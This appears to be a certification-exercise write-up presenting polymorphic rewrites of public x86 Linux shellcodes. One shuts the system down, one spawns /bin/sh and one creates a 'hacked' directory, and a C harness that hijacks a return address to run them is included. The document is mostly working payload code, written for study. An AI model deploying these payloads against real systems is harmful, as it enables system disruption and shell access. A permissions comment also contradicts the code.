; http://shell-storm.org/shellcode/files/shellcode-876.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 69 bytes
global _start
_start:
cdq
mul edx
push word 0x682d
mov edi, esp
push eax
push 0x6e
mov WORD [esp+0x1],0x776f
mov edi, esp
push eax
mov dword [esp-4], 0x6e776f64
mov dword [esp-8], 0x74756873
mov dword [esp-12], 0x2f2f2f6e
mov dword [esp-16], 0x6962732f
sub esp, 16
mov ebx, esp
push edx
push esi
push edi
push ebx
mov ecx, esp
mov al, 0xb
int 0x80
Has we can see on the following block of code below, there is some modification of the assembly which give a different shellcode but give the same result. The modified versions have 69 bytes. So, this is less than the 150% of the original shellcode. The maximum allowed for the assignment of this sample is 84 bytes.
; http://shell-storm.org/shellcode/files/shellcode-752.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 30 bytes
global _start
_start:
xor eax, eax
xor ecx, ecx
push eax
mov dword [esp-4], 0x68732f2f
mov dword [esp-8], 0x6e69622f
sub esp, 8
mov ebx, esp
mov al, 11
int 0x80
The polymorphic version have 30 bytes which is a bit more but still less than 150% of the original shellcode. Since the original shellcode was pretty small, there is less possibilities to make it smaller with different instructions. The maximum size allowed is 31 bytes.
/*
* This shellcode will do a mkdir() of 'hacked' and then an exit()
* Written by zillion@safemode.org
*
*/
char shellcode[]=
"\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed"
"\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68"
"\x61\x63\x6b\x65\x64\x23";
void main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
The author only gave the shellcode. So, for the purpose of the SLAE, we will get the assembly of that shellcode for better understanding and be able to create a polymorphic version of it.
00000000 EB16 jmp short 0x18
00000002 5E pop esi
00000003 31C0 xor eax,eax
00000005 884606 mov [esi+0x6],al
00000008 B027 mov al,0x27
0000000A 8D1E lea ebx,[esi]
0000000C 66B9ED01 mov cx,0x1ed
00000010 CD80 int 0x80
00000012 B001 mov al,0x1
00000014 31DB xor ebx,ebx
00000016 CD80 int 0x80
00000018 E8E5FFFFFF call 0x2
0000001D 6861636B65 push dword 0x656b6361
00000022 64 fs
00000023 23 db 0x23
The original shellcode has 36 bytes. Let's make a polymorphic version and see if we can make a smaller one.
Polymorphic shellcode version
I realized that a lot of the assembly in the original one can be modified to do a different version of it. Let's keep it simple. Basically, the shellcode will create a mkdir folder with the name "hacked" with the right 775.
My final assembly polymorphic shellcode is pretty different but does the same thing.
; http://shell-storm.org/shellcode/files/shellcode-542.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 28 bytes
global _start
_start:
xor eax,eax
push eax
;sys mkdir
mov al,0x27
; push ./hacked
push 0x64656b63
push 0x61682f2e
mov ebx,esp
; push 777 which equal to 0x1ff in octal
mov cx, 0x1ff
int 0x80
;sys exit
push 0x1
pop eax
int 0x80
